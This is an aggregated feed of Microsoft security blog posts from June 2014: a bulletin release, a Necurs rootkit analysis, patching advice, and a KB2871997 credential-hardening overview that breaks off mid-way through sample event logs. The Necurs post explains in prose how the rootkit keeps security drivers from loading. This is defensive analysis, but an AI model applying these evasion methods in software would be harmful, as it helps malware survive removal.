2014 Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/06/10/theoretical-thinking-and-the-june-2014-bulletin-release.aspxTue, 10 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:6961a17f-c019-47c8-83da-29c258bf7e60Dustin C. Childs0<p>As security professionals, we are trained to think in worst-case scenarios. &nbsp;We run through the land of the theoretical, chasing &ldquo;what if&rdquo; scenarios as though they are lightning bugs to be gathered and stashed in a glass jar. &nbsp;Most of time, this type of thinking is absolutely the correct thing for security professionals to do. &nbsp;We need to be prepared for when, not if, these disruptive events occur. &nbsp;However, every now and then, it can be productive to draw ourselves out of this hypothetical mentality and look instead at the real impact in the here and now.</p> <p>Speaking of the here and now, <a href="http://technet.microsoft.com/security/bulletin/MS14-jun">today</a> we release seven security bulletins, two rated Critical and five rated Important in severity, addressing 66 Common Vulnerabilities and Exposures (CVEs) for Microsoft Windows, Internet Explorer, and Microsoft Office customers. &nbsp;But before we get into the details of the updates, I want to take a moment to provide some additional insight into how we assess and recommend those severity ratings. &nbsp;For every issue, we consider &rdquo;what if&rdquo;<i> </i>&ndash; what&rsquo;s the severest outcome from a potential cyberattack? &nbsp;We want to provide our best guidance on the risk assessment for our customers, and that requires consideration of the worst-case scenario.</p> <p>If we consider the worst-case scenario analogous to a tree falling in the woods, is there a sound if no one is around to hear it?&nbsp; Similarly, does a vulnerability make a sound if it never gets exploited? &nbsp;When we become aware of a potential security issue, we work to fix it regardless of whether or not it is under active attack. &nbsp;In other words, it doesn&rsquo;t matter if that falling tree makes a noise; we still have an action to take. &nbsp;Why? &nbsp;Because one day in the future, it&rsquo;s possible what we&rsquo;re delivering today <i>could</i> get exploited if not addressed. &nbsp;However, we&rsquo;re not in the future; we&rsquo;re in the land of the here and now. &nbsp;And while we are in this land, we sometimes confuse theoretical thinking with the actuality of impact to real people.&nbsp; Until something actually occurs it is still theory; we&rsquo;re taking the theoretical and making practical updates against future &ldquo;what ifs&rdquo;.</p> <p>Let&rsquo;s look at an example from this month&rsquo;s release. &nbsp;The security bulletin for Internet Explorer (IE) resolves 59 items, including CVE-2014-1770.&nbsp; The most serious of these could allow remote code execution if a user views a webpage specially crafted by a cybercriminal.&nbsp; We still haven&rsquo;t seen any active attacks attempting to exploit <i>any</i> of the other CVEs addressed by this bulletin. &nbsp;While there are a number of things being addressed this time around, it&rsquo;s important to note that, to our knowledge, <span style="text-decoration:underline;">none</span> of these now-addressed CVEs have caused <span style="text-decoration:underline;">any customer impact to date</span>. &nbsp;</p> <p>Addressing items before active attacks occur helps keep customers better protected. &nbsp;The Internet Explorer update for this month includes additional security updates that will help protect our customers, which is yet another reason why it&rsquo;s good to stay current with the latest updates.</p> <p>If you&rsquo;ve seen the recent <a href="http://blogs.windows.com/ie/b/ie/archive/2014/06/10/keep-internet-explorer-up-to-date-for-more-secure-web-browsing.aspx">blog</a> from the IE team, you&rsquo;ll also see another message:&nbsp; Customers should update to the latest version of Internet Explorer.&nbsp; For Windows 7 and Windows 8.1, that means Internet Explorer 11&mdash;the most modern, secure browser we&rsquo;ve ever built. &nbsp;IE11 has advanced security features like <a href="http://msdn.microsoft.com/library/ie/dn265025(v=vs.85).aspx">Enhanced Protection Mode (EPM)</a> and <a href="http://windows.microsoft.com/en-us/internet-explorer/use-smartscreen-filter#ie=ie-11">SmartScreen Filter</a>, support for modern web standards, and Enterprise Mode for rendering legacy web apps.&nbsp; Internet Explorer 11 is much more secure than older versions, which is why we encourage customers to upgrade.</p> <p>There are six other bulletins released today to improve your security as well. &nbsp;For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-jun">Microsoft Bulletin Summary Web page</a>.</p> <p>Here&rsquo;s an overview of all the updates released today:</p> <p><i>Click to enlarge<br /></i><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2860.Deployment.jpg"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2860.Deployment.jpg" border="0" alt=" " /></a></p> <p>As always, we encourage you to apply all of the updates, but for those who prioritize, we recommend the <a href="https://technet.microsoft.com/library/security/ms14-034">Word</a> and <a href="https://technet.microsoft.com/library/security/ms14-035">Internet Explorer</a> updates be on the top of your list.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801">Security Advisory 2755801</a> with the latest update for Adobe Flash Player. in Internet Explorer. &nbsp;The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-16. &nbsp;For more information about this update, including download links, see Microsoft Knowledge Base Article 2966072.</p> <p>Watch the bulletin overview video below for a brief summary of today&#39;s releases.</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/Q_SGCPm57xE?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/Q_SGCPm57xE?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>Andrew Gross and I will host the monthly security bulletin webcast, scheduled for Wednesday, June 11, 2014, at 11 a.m. PDT. I invite you to register <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572980&amp;Culture=en-US">here</a>, and tune in to learn more about this month&rsquo;s security bulletins.</p> <p>For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>I look forward to hearing any questions about this month&rsquo;s release during our webcast tomorrow.</p> <p>Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a> <br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632472&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Windowsmonthly bulletin releaseSecurity BulletinsInternet Explorer (IE)Security UpdateMicrosoft Office MSRT June 2014 – Necurshttp://blogs.technet.com/b/mmpc/archive/2014/06/10/msrt-june-2014-necurs.aspxTue, 10 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:12123ddc-4b8c-4630-882b-0456aeded174msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/10/msrt-june-2014-necurs.aspx#comments<div class="ExternalClass02D925F7AAE54D96844382AA9D2BF2B8"> <p>This month we added <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Necurs">Win32/Necurs</a> to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Microsoft Malicious Software Removal Tool</a> (MSRT). In a <a href="http://blogs.technet.com/b/mmpc/archive/2012/12/07/unexpected-reboot-necurs.aspx">previous blog</a>&nbsp;about Necurs&nbsp;I outlined the family&#39;s prevalence and the techniques it uses to execute its payload. In this blog, I will discuss the Necurs rootkit components <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:WinNT/Necurs.A">Trojan:WinNT/Necurs.A</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win64/Necurs.A">Trojan:Win64/Necurs.A</a> in greater depth.</p> <p>These Necurs rootkit components are sophisticated drivers that try to block security products during every stage of Windows startup.</p> <p>It&rsquo;s important to note that Microsoft security products can detect and remove these rootkit components, as well as other threats within the Necurs family.</p> <p>Figure 1 illustrates the stages of the startup process where a security product could launch its protection, and how Necurs tries block these efforts. We&rsquo;ll elaborate more on this below.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/necurs2.png"> <img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/necurs2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Necurs attempts to interfere with security products that could block it during startup</em></p> <p><strong>AM ELAM driver stage</strong></p> <p>The Early Launch Antimalware (ELAM) driver is a new antimalware feature introduced in Windows 8. It allows the antimalware driver to launch before any third-party software, and is therefore able to detect some malware in the boot process and prevent it from initializing. However, because the driver launches at the very early boot stage, and considering its efficiency and dependencies, the security check is restricted.</p> <p>Necurs signer information is auto-generated with a random signer name. This means there isn&#39;t meaningful information from the certificate that the ELAM driver can use. The registry entry name is also generated with a random name. The file is polymorphically encrypted, which results in variable hashes. These techniques prevent ELAM from blocking it effectively.</p> <p><strong>AM boot-start driver stage</strong></p> <p>The boot-start drivers are loaded after ELAM. Antimalware drivers can be also launched at this stage. It is important to note that there is also an internal loading priority order for boot-start drivers. Necurs registers itself as a member of one of the top priority loading groups, meaning it can be typically loaded before any boot-start type antimalware driver.</p> <p><strong>AM system/other start type driver stage</strong></p> <p>When the Necurs driver is installed for the first time it immediately takes a system running driver snapshot and puts the drivers that it considers allowable into a whitelist. A driver blacklist is also used to help create this whitelist. The logic is:</p> <ul> <li>Step 1: If the driver file name is not in the blacklist, continue to check step 2.</li> <li>Step 2: If the driver security section in memory doesn&rsquo;t contain certain key words in the blacklist, put into whitelist.</li> </ul> <p>The blacklist contains most of the major security products that I mentioned in my previous blog.<br />Once the filtering is done, the whitelist is saved in a hidden registry entry as an MD5 list for each driver. During system startup, the hidden registry is loaded and Necurs blocks any driver that isn&rsquo;t in the whitelist from loading.</p> <p>By doing this any antimalware drivers that run after Necurs are terminated - even if they contain a random name, or deploy strong self-protection functions. The method Necurs uses to monitor the loading driver is notable. Boot-start and other start type drivers are treated separately as follows:</p> <ul> <li>Boot-start drivers: Necurs retrieves all the boot-start driver information from a global system variable in memory which is generated by osloader.</li> <li>System-start and other drivers: An image-notify routine is installed for monitoring all the drivers before they start.</li> </ul> <p>In order to protect this hidden whitelist registry entry from being deleted or modified by antimalware software Necurs sets a registry-callback routine to monitor the registry access behavior. Any request to open and remove the malware registry is blocked. Even if antimalware software can bypass this trick, the whitelist is not easy to touch because if it&rsquo;s wiped it can result in a Blue Screen of Death (BSOD) when the system critical driver is also blocked by Necurs during system startup. Adding an antimalware driver into the list is also difficult. The MD5 value is customized based on certain areas of the image in memory chosen by Necurs. That means simply calculating the file-based MD5 won&rsquo;t work. The MD5 location also needs to be calculated by customized sorting algorithm. In that way, simply adding any MD5 at start or end of the list would also trigger BSOD.</p> <p>Necurs rootkits are widely used in the wild by lot of prevalent malware as a self-protection component. You can read more technical details for these threats in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Necurs">Win32/Necurs</a> family description.</p> <p>To help stay protected we recommend you to install an up-to-date, real-time protection security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Tim Liu</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3632475&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Keeping Oracle Java updated continues to be high security ROIhttp://blogs.technet.com/b/security/archive/2014/06/09/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspxMon, 09 Jun 2014 17:18:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:55707084-ad5e-4b98-aeae-b416476c8cf7Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3632179http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3632179http://blogs.technet.com/b/security/archive/2014/06/09/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspx#comments<p>New data from the recently-published Security Intelligence Report volume 16 (SIRv16) suggests that keeping Java up-to-date with security updates is one of the most effective ways to protect environments from attackers.&nbsp; One of the most popular tactics attackers use to try to exploit vulnerabilities in Java is using exploit kits.&nbsp;&nbsp;</p> <p>&nbsp;Exploit kits used by cybercriminals to attack software have been around since at least 2006 in various forms. In 2010, the initial release of the Blackhole exploit kit made it easier than ever to configure and operate malicious websites designed to try to infect unpatched systems with malware. I have written about this particular exploit kit before:&nbsp;<a href="/b/security/archive/2012/07/19/the-rise-of-the-black-hole-exploit-kit-the-importance-of-keeping-all-software-up-to-date.aspx">The Rise of the &ldquo;Blackhole&rdquo; Exploit Kit: The Importance of Keeping All Software Up To Date</a>. <a href="/b/security/archive/2014/06/10/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspx">Read more.</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/09/keeping-oracle-java-updated-continues-to-be-high-security-roi.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632179&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">BlackholeOracle JavaMicrosoft Security Intelligence ReportSIRv16exploits Protecting Data and Privacy in the Cloud: Part 2http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspxThu, 05 Jun 2014 23:30:32 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b888ea76-0c1b-43ee-9153-b94aa3555f35Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong><br /><br />Microsoft understands that a customer&rsquo;s willingness to use a particular cloud computing service depends on their ability to trust that the privacy of their information will be protected, and that their data will only be used in a manner consistent with customer expectations. But even the best designed and implemented services can only protect customer data if they are deployed in a secured environment.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3632266&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersBrendon LynchCloudOffice 365Trustprivacy and reliabilitycustomer perspectiveProcessesSecurityCloud Computingcloud servicesTrustworthy ComputingMicrosoftpersonal dataDataPrivacyMicrosoft Cloud Solutions Get advance notice about June 2014 security updateshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/06/05/get-advance-notice-about-june-2014-security-updates.aspxThu, 05 Jun 2014 19:20:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10530320Eve Blakemore17http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10530320http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/05/get-advance-notice-about-june-2014-security-updates.aspx#comments<p>Today, the Microsoft Security Response Center (MSRC) posted&nbsp;details&nbsp;about the&nbsp;<a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jun">June security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar&mdash;be sure to click it.</p> <p>In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the<span class="apple-converted-space">&nbsp;</span><a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter<span class="apple-converted-space">&nbsp;</span><strong>Turn automatic updating on or off</strong>, and tap or click<span class="apple-converted-space">&nbsp;</span><strong>Settings</strong><span class="apple-converted-space">&nbsp;</span>to find it.&nbsp;</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The&nbsp;<a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a>&nbsp;offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10530320" width="1" height="1">security updatesautomatic updatingAutomatic UpdatesMicrosoft UpdateWindows 7Windows UpdateMicrosoftAdvance Notification ServiceWindows 8 An Overview of KB2871997http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspxThu, 05 Jun 2014 17:23:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:836d19c0-3542-42e3-9274-80354f907f7cSRD Blog Author0<h1>An Overview of KB2871997</h1> <p>Microsoft recently released KB2871997 for Windows 7, Windows 8, Windows Server 2008R2, and Windows Server 2012. This blog will give an overview of the feature changes, their impact, and some important configuration changes that can be made in conjunction with the update to further improve system security.</p> <p><b>1. Support for the Protected Users group</b></p> <p style="margin-left:30px;">&ldquo;Protected Users&rdquo; is a security group added to Windows Server 2012R2 domains. When a user account is added to the &ldquo;Protected Users&rdquo; group, several additional security restrictions are placed on the account:</p> <ol> <li style="list-style-type:none;"><ol> <li>A&nbsp;member of the Protected Users group can only sign on using the Kerberos protocol. The account cannot authenticate using NTLM, Digest Authentication, or CredSSP. On a device running Windows 8, passwords are not cached, so the device that uses any one of these Security Support Providers (SSPs) will fail to authenticate to a domain when the account is a member of the Protected User group.</li> <li>The Kerberos protocol will not use the weaker DES or RC4 encryption types in the pre-authentication process. This means that the domain must be configured to support at least the AES cypher suite.</li> <li>The user&rsquo;s account cannot be delegated with Kerberos constrained or unconstrained delegation. This means that former connections to other systems may fail if the user is a member of the Protected Users group.</li> </ol></li> </ol> <p style="margin-left:30px;">In a nutshell, this setting blocks everything besides Kerberos authentication and applies hardening to the Kerberos authentication used (enforces AES encryption). We recommend you place high value accounts, such as accounts used by server administrators, in the &ldquo;Protected Users&rdquo; group to harden the accounts.</p> <p style="margin-left:30px;">Since a &ldquo;Protected User&rdquo; is restricted to Kerberos authentication they work well with &ldquo;Authentication Policies and Silos&rdquo;, a new feature introduced for Windows 2012R2 functional level domains. Authentication Policies and Silos allow you to place users and computers within a silo and apply policy (such as logon restrictions) to them. More information on &ldquo;Authentication Policies and Silos&rdquo; can be found here: <a href="http://technet.microsoft.com/en-us/library/dn486813.aspx">http://technet.microsoft.com/en-us/library/dn486813.aspx</a>.</p> <p><b>2. Remote Desktop Client support for the Restricted Admin RDP mode</b></p> <p style="margin-left:30px;">Part of Microsoft&rsquo;s official guidance for reducing the risk of lateral movement (or pass-the-hash) attacks is to authenticate to servers using a &ldquo;network logon&rdquo; (a specific Windows logon type). Why? Because when a user authenticates to a remote server using a &ldquo;network logon&rdquo;, the users credential is never sent to the remote server. This means that even if the remote server is compromised, the users credential cannot be captured.</p> <p style="margin-left:30px;">Virtually every management tool Microsoft ships authenticates using &ldquo;network logon&rdquo;. This includes but is not limited to: PowerShell Remoting, WinRM, PSExec, WMI, etc&hellip; Prior to this update, Remote Desktop required the user send their clear-text password to the remote server (encrypted over-the-wire but decrypted on the remote server) so they could log on for an interactive session. With this update, it is now possible to use Remote Desktop without sending credentials to the remote server.</p> <p style="margin-left:30px;">Note that this update back ports changes to the Remote Desktop client, not Remote Desktop server. This means you can make Restricted Admin connects from an updated system, but you can only make Restricted Admin connects to a Windows 8.1/2012R2 system.</p> <p style="margin-left:30px;">Only administrators can use the &ldquo;Restricted Admin&rdquo; mode; members of the &ldquo;Remote Desktop Users&rdquo; group are not allowed to use the Restricted Admin mode. Because the users credential is not sent to the remote system, it is impossible for the user to make authenticated connections from the remote system to other systems. Since the user connecting to the system is an administrator (and can by-design impersonate other users on the system), we have made Restricted Admin connections automatically impersonate the computer account for remote connections. This allows a Restricted Admin to access network resources such as shares as long as the computer account has access.</p> <p style="margin-left:30px;">Microsoft recommends that Restricted Admin is used whenever possible, as this follows the &ldquo;least privilege&rdquo; principal. If you are authenticating to a server (even a highly trusted server) and do not need to &ldquo;double hop&rdquo; with your privileged account, it is recommended you use Restricted Admin. One common scenario that will greatly benefit from Restricted Admin is the &ldquo;helpdesk scenario&rdquo; where a helpdesk agent uses remote desktop with a privileged account to repair user workstations.</p> <p style="margin-left:30px;">Restricted Admin can be used by starting Remote Desktop as follows:</p> <p style="margin-left:30px;">Mstsc.exe /restrictedadmin</p> <p><b></b><b>3. LSA Credential Cleanup &amp; Other Changes</b></p> <p style="margin-left:30px;"><b></b><b>a. Removal of credentials after logoff</b></p> <p style="margin-left:60px;">As outlined in Microsoft&rsquo;s <a href="http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf" title="Pass-the-hash whitepaper">Pass-the-hash whitepaper</a>,&nbsp;Windows caches the credentials of a user in the LSASS process whenever the user logs in. This includes the user&rsquo;s clear-text password, the users NT/LM password hash, and the users Kerberos TGT/Session key. When the user logs off, the credentials should be cleared out of memory. Prior to this update, this was not always the case. This issue preventing credentials from being cleared is now fixed, credentials will always be cleared from memory after a user logs off.</p> <p style="margin-left:30px;"><b>&nbsp;b.&nbsp;</b><b></b><b>New well known SID&rsquo;s</b></p> <p style="margin-left:60px;">This update adds support for two new well known SID&rsquo;s:</p> <ol> <li style="margin-left:30px;"><strong>LOCAL_ACCOUNT</strong> &ndash; Any local account will inherit this SID</li> <li style="margin-left:30px;"><strong>LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP</strong> &ndash; Any local account that is a member of the administrators group will inherit this SID</li> </ol> <p style="margin-left:60px;">These SID&rsquo;s were introduced to make it easier to prevent local accounts from being used over the network (something attackers commonly do when performing pass-the-hash attacks). An administrator can configure the Group Policy settings &ldquo;Deny access to this computer from the network&rdquo; and &ldquo;Deny log on through Remote Desktop Services&rdquo; using the above SID&rsquo;s to prevent attacks from using local accounts over the network. More information on these settings (and detailed instructions) can be found in Microsoft&rsquo;s Pass-The-Hash whitepaper.</p> <p style="margin-left:30px;"><b>c. Removal of clear-text credentials from LSASS</b></p> <p style="margin-left:60px;">As noted previously, one of the credentials stored by LSASS is the user&rsquo;s clear-text password. This update prevents every Microsoft SSP in LSASS, besides WDigest, from storing the user&rsquo;s clear-text password. WDigest still stores the user&rsquo;s clear-text password because it cannot function without the user&rsquo;s password (Microsoft does not want to break existing customer setups by shipping an update to disable this). Microsoft recommends users look through their domain controller logs for Digest authentication logons (instructions provided below); if Digest authentication is not being used, customers can apply the FixIt found on the <a href="http://support.microsoft.com/kb/2871997" title="KB article">KB article</a> to disable WDigest. Doing this will eliminate all clear-text credentials from LSASS memory.</p> <p style="margin-left:60px;">It&rsquo;s important to realize that while clear-text credentials will no longer be stored, the NT hash and Kerberos TGT/Session key will still be stored and are considered credentials (without credential equivalents stored in memory, single sign-on would be impossible). Additionally, even though the clear-text credentials are no longer stored in memory, an attacker can use other techniques such as key loggers to recover clear-text passwords. Eliminating clear-text passwords from memory is useful and reduces risk, but it is not guaranteed to stop attackers.</p> <p style="margin-left:60px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p> <h2>Identifying WDigest use:</h2> <p>WDigest use can be identified in two places: your domain controller logs, or your server logs (every server must be checked).</p> <p><b>1.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b><b>Domain Controller Security Event Logs: Event ID 4776</b></p> <p style="text-align:left;"><span style="background-color:#ffff00;">Authentication Package:&nbsp;&nbsp;&nbsp;&nbsp; WDigest</span></p> <p style="text-align:left;">Logon Account:&nbsp;&nbsp;&nbsp; Administrator</p> <p style="text-align:left;">Source Workstation:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WIN2K12R2CLIENT</p> <p style="text-align:left;">Error Code:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x0</p> <p>&nbsp;</p> <p><b>2.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b><b>Server Security Event Logs: Event ID 4624 (must be checked on all servers)</b></p> <p>An account was successfully logged on.</p> <p>Subject:</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Security ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NULL SID</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Account Name:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Account Domain:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logon ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x0</p> <p>Logon Type:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3</p> <p>Impersonation Level:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Impersonation</p> <p>New Logon:</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Security ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TESTLAB\administrator</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Account Name:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Administrator</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Account Domain:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TESTLAB</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logon ID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x2D8B63</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Logon GUID:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {00000000-0000-0000-0000-000000000000}</p> <p>Process Information:</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Process 